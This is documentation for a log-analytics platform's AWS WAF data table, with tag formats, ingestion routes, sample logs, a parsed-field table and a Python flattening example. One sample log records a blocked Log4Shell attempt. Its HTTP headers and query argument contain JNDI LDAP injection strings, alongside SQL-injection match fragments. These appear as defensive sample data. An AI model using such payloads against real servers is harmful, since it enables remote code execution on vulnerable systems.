cloud.aws.waf

Introduction

The tags beginning with cloud.aws.waf identify events generated by the Amazon AWS WAF service.

Valid tags and data tables

The full tag can have 4 to 6 levels. The first two are fixed as cloud.aws. The third level identifies the type of events sent, and the fourth, fifth and sixth levels indicate the event subtype.

| Technology | Brand | Type | Subtype 1 | Subtype 2 | Subtype 3 |
|---|---|---|---|---|---|
| cloud | aws | waf | logs | <accountId> | <region> |

These are the valid tags and corresponding data tables that will receive the parsers' data:

| Tag | Data table |
|---|---|
| cloud.aws.waf.logs.<accountId>.<region> | cloud.aws.waf.logs |

How is the data sent to Devo?

Logs generated by the AWS WAF service can be sent to the AWS CloudWatch Logs, S3, and Kinesis Data Firehose services.

The preferred methods use the first two services as destinations. In these cases, the Devo AWS collector can be used for gathering, properly tagging, and securely forwarding these logs to Devo.

Logs sent to Kinesis Data Firehose can be properly tagged using an AWS Lambda function and forwarded to a Devo HTTP(s) endpoint (as an alternative, a Devo Relay deployed in an EC2 instance can be used for tagging and securely forwarding events using the Syslog protocol).

Log samples

The following are sample logs sent to each of the cloud.aws data tables. Also, find how the information will be parsed in your data table under each sample log.

Extra columns

Fields marked as Extra in the table below are not shown by default in data tables and need to be explicitly requested in the query. You can find them marked as Extra when you perform a query so they can be easily identified. Learn more about this in Selecting unrevealed columns.

cloud.aws.waf.logs.a.b

2021-12-29 10:38:58.309 localhost=127.0.0.1 cloud.aws.waf.logs.a.b: {"timestamp": 1533689070589, "formatVersion": 24376, "webaclId": "5d3a0adeee61858270fa84872b5977c42a7a0d", "terminatingRuleId": "52dcc9331ed1b33d", "terminatingRuleType": "4354445e0", "action": "9b75f21", "httpSourceName": "5544", "httpSourceId": "91107a8", "ruleGroupList": [{"ruleGroupId": "8d2527566419d3b0b3df3467f7fee63b73e9d5", "terminatingRule": null, "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "httpRequest": {"clientIp": "31957ab1ae7f55", "country": "c285", "headers": [{"name": "f2e782", "value": "6b8868d4f674fc0c"}, {"name": "931caa3e8553", "value": "866864a87b4ba"}, {"name": "1aab2862", "value": "28c25"}], "uri": "e3f3cf5928", "args": "bba95d7174dd4", "httpVersion": "6ca115b920", "httpMethod": "a4c51", "requestId": "02fbbed2d9f72a0bb671ff69"}}
2021-12-29 10:38:58.731 localhost=127.0.0.1 cloud.aws.waf.logs.a.b: {"timestamp": 1640137470799, "formatVersion": 1, "webaclId": "arn:aws:test", "terminatingRuleId": "AWSManagedRulesKnownBadInputsRuleSet", "terminatingRuleType": "MANAGED_RULE_GROUP", "action": "BLOCK", "terminatingRuleMatchDetails": [{"conditionType": "test1", "location": "tucasa", "matchedData": ["data1", "data2"]}], "httpSourceName": "ALB", "httpSourceId": "testid", "ruleGroupList": [{"ruleGroupId": "AWS#AWSManagedRulesKnownBadInputsRuleSet", "terminatingRule": {"ruleId": "Log4JRCE", "action": "BLOCK", "ruleMatchDetails": {"conditionType": "SQL_INJECTION", "location": "HEADER", "matchedData": ["10", "and", "1"]}}, "nonTerminatingMatchingRules": [{"ruleId": "RuleB-SQLi", "action": "COUNT", "ruleMatchDetails": [{"conditionType": "SQL_INJECTION", "location": "HEADER", "matchedData": ["10", "and", "1"]}]}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "requestHeadersInserted": [{"name": "x-amzn-waf-test-header-name", "value": "test-header-value"}], "responseCodeSent": 1234, "httpRequest": {"clientIp": "0.0.0.0", "country": "AU", "headers": [{"name": "Host", "value": "laptop-88.mydomain.org"}, {"name": "User-Agent", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "Connection", "value": "close"}, {"name": "X-Apple-Request-Uuid", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "X-Forwarded-For", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "X-Forwarded-Host", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "Accept-Encoding", "value": "gzip"}], "uri": "/", "args": "test=${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4", "httpVersion": "HTTP/1.1", "httpMethod": "GET", "requestId": "1-61c282fe-064defd64aab2d3065f7f540"}, "labels": [{"name": "awswaf:managed:aws:known-bad-inputs:Log4JRCE"}]}

And this is how the log would be parsed:

| Field | Value | Type | Field transformation | Source field name | Extra fields |
|---|---|---|---|---|---|
| httpRequest_requestId | 02fbbed2d9f72a0bb671ff69 | str | | | |
| webaclId | 5d3a0adeee61858270fa84872b5977c42a7a0d | str | | | |
| nonTerminatingMatchingRules_action_str | 6af7476 | str | join(nonTerminatingMatchingRules_action, ',') | nonTerminatingMatchingRules_action | |
| httpRequest_headers_value_str | 6b8868d4f674fc0c,866864a87b4ba,28c25 | str | join(httpRequest_headers_value, ',') | httpRequest_headers_value | |
| httpRequest_httpVersion | 6ca115b920 | str | | | |
| ruleGroupList_ruleGroupId_str | 8d2527566419d3b0b3df3467f7fee63b73e9d5 | str | join(ruleGroupList_ruleGroupId, ',') | ruleGroupList_ruleGroupId | |
| action | 9b75f21 | str | | | |
| terminatingRuleId | 52dcc9331ed1b33d | str | | | |
| rateBasedRuleList_limitKey_str | 7e01,7e01 | str | join(rateBasedRuleList_limitKey, ',') | rateBasedRuleList_limitKey | |
| nonTerminatingMatchingRules_ruleId_str | 450eac3b8deb833645fb20dc4480d14cedd214 | str | join(nonTerminatingMatchingRules_ruleId, ',') | nonTerminatingMatchingRules_ruleId | |
| timestamp | 2018-08-08 00:44:30.589 | timestamp | | | |
| eventdate | 2021-12-29 10:38:58.309 | timestamp | | | |
| httpRequest_clientIp | 31957ab1ae7f55 | str | | | |
| httpSourceId | 91107a8 | str | | | |
| terminatingRuleType | 4354445e0 | str | | | |
| httpSourceName | 5544 | str | | | |
| formatVersion | 24376 | int4 | | | |
| ACCID | a | str | | | |
| REGION | b | str | | | |
| httpRequest_country | c285 | str | | | |
| httpRequest_httpMethod | a4c51 | str | | | |
| terminatingRuleMatchDetails_conditionType_str | null | str | join(terminatingRuleMatchDetails_conditionType, ',') | terminatingRuleMatchDetails_conditionType | |
| terminatingRuleMatchDetails_location_str | null | str | join(terminatingRuleMatchDetails_location, ',') | terminatingRuleMatchDetails_location | |
| terminatingRuleMatchDetails_matchedData_str | null | str | join(terminatingRuleMatchDetails_matchedData, ',') | terminatingRuleMatchDetails_matchedData | |
| requestHeadersInserted_name_str | null | str | join(requestHeadersInserted_name, ',') | requestHeadersInserted_name | |
| requestHeadersInserted_value_str | null | str | join(requestHeadersInserted_value, ',') | requestHeadersInserted_value | |
| responseCodeSent | null | int4 | | | |
| labels_name_str | null | str | join(labels_name, ',') | labels_name | |
| httpRequest_uri | e3f3cf5928 | str | | | |
| rateBasedRuleList_maxRateAllowed_str | [14171,14171] | str | stringify(json(rateBasedRuleList_maxRateAllowed)) | rateBasedRuleList_maxRateAllowed | |
| httpRequest_args | bba95d7174dd4 | str | | | |
| hostname | localhost | str | | | |
| hostchain | localhost=127.0.0.1 | str | | | ✓ |
| httpRequest_headers_name_str | f2e782,931caa3e8553,1aab2862 | str | join(httpRequest_headers_name, ',') | httpRequest_headers_name | |
| tag | cloud.aws.waf.logs.a.b | str | | | ✓ |
| rateBasedRuleList_rateBasedRuleId_str | b04caf3737843bcdcce00c5b88d21879dce251,851a7540377b76d2f24773a2a62665702e3bb | str | join(rateBasedRuleList_rateBasedRuleId, ',') | rateBasedRuleList_rateBasedRuleId | |
| ruleGroupList_nonTerminatingMatchingRules_str | [{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}] | str | join(ruleGroupList_nonTerminatingMatchingRules, ',') | ruleGroupList_nonTerminatingMatchingRules | |
| ruleGroupList_excludedRules_str | [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}] | str | join(ruleGroupList_excludedRules, ',') | ruleGroupList_excludedRules | |
| rawMessage | {"timestamp": 1533689070589, "formatVersion": 24376, "webaclId": "5d3a0adeee61858270fa84872b5977c42a7a0d", "terminatingRuleId": "52dcc9331ed1b33d", "terminatingRuleType": "4354445e0", "action": "9b75f21", "httpSourceName": "5544", "httpSourceId": "91107a8", "ruleGroupList": [{"ruleGroupId": "8d2527566419d3b0b3df3467f7fee63b73e9d5", "terminatingRule": null, "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "httpRequest": {"clientIp": "31957ab1ae7f55", "country": "c285", "headers": [{"name": "f2e782", "value": "6b8868d4f674fc0c"}, {"name": "931caa3e8553", "value": "866864a87b4ba"}, {"name": "1aab2862", "value": "28c25"}], "uri": "e3f3cf5928", "args": "bba95d7174dd4", "httpVersion": "6ca115b920", "httpMethod": "a4c51", "requestId": "02fbbed2d9f72a0bb671ff69"}} | str | | | |
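The flattening conventions in the table above (nested keys joined with "_", string lists collapsed with join(field, ','), numeric lists with stringify(json(field)), nulls dropped, and ACCID/REGION taken from the tag) reproduced as an added, stand-alone Python example; this is not Devo's parser, and the trimmed input line is constructed from the page's first sample:

```python
import json
from datetime import datetime, timezone

# Constructed input in the "<eventdate> <hostchain> <tag>: <json>" shape shown on this page (trimmed first sample).
SAMPLE_LINE = (
    "2021-12-29 10:38:58.309 localhost=127.0.0.1 cloud.aws.waf.logs.a.b: "
    '{"timestamp": 1533689070589, "formatVersion": 24376, "action": "9b75f21", "ruleGroupList": [{"ruleGroupId": "8d25", '
    '"terminatingRule": null, "excludedRules": [{"exclusionType": "e551", "ruleId": "6efa"}]}], "rateBasedRuleList": '
    '[{"rateBasedRuleId": "b04c", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a", "limitKey": "7e01", '
    '"maxRateAllowed": 14171}], "httpRequest": {"clientIp": "31957ab1ae7f55", "headers": [{"name": "f2e782", "value": "6b88"}, '
    '{"name": "931caa3e8553", "value": "8668"}], "uri": "e3f3cf5928"}}'
)

def collapse(values):
    # join(field, ',') for strings, stringify(json(field)) for numbers, JSON text for nested objects
    if all(isinstance(v, str) for v in values):
        return ",".join(values)
    if all(isinstance(v, (int, float)) for v in values):
        return json.dumps(values, separators=(",", ":"))
    return ",".join(json.dumps(v) for v in values)

def flatten(obj, prefix="", out=None):
    # nested keys become prefix_key; a list of objects yields one <name>_<subkey>_str column per sub-key
    out = {} if out is None else out
    for key, val in obj.items():
        name = prefix + key
        if val is None:  # nulls (e.g. terminatingRule) produce no column
            continue
        if isinstance(val, dict):
            flatten(val, name + "_", out)
        elif isinstance(val, list) and val and all(isinstance(v, dict) for v in val):
            for sub in dict.fromkeys(k for item in val for k in item):  # first-seen key order
                picked = [item[sub] for item in val if item.get(sub) is not None]
                if picked:
                    out[f"{name}_{sub}_str"] = collapse(picked)
        elif isinstance(val, list):
            out[name + "_str"] = collapse(val)
        else:
            out[name] = val
    return out

def parse_line(line):
    head, _, raw = line.partition(": ")  # the first ': ' ends the syslog-style header
    eventdate, (hostchain, tag) = head[:23], head[24:].split()
    fields = flatten(json.loads(raw))
    fields.update(eventdate=eventdate, hostchain=hostchain, hostname=hostchain.split("=")[0], tag=tag)
    fields.update(zip(("ACCID", "REGION"), tag.split(".")[4:6]))  # cloud.aws.waf.logs.<accountId>.<region>
    if isinstance(fields.get("timestamp"), int):  # epoch ms -> "YYYY-MM-DD HH:MM:SS.mmm" in UTC
        ts = datetime.fromtimestamp(fields["timestamp"] // 1000, tz=timezone.utc)
        fields["timestamp"] = f"{ts:%Y-%m-%d %H:%M:%S}.{fields['timestamp'] % 1000:03d}"
    return fields
```

Running parse_line(SAMPLE_LINE) yields the same column names and values as the table rows for the keys present in the trimmed sample, and a 4-level tag simply produces no ACCID or REGION columns.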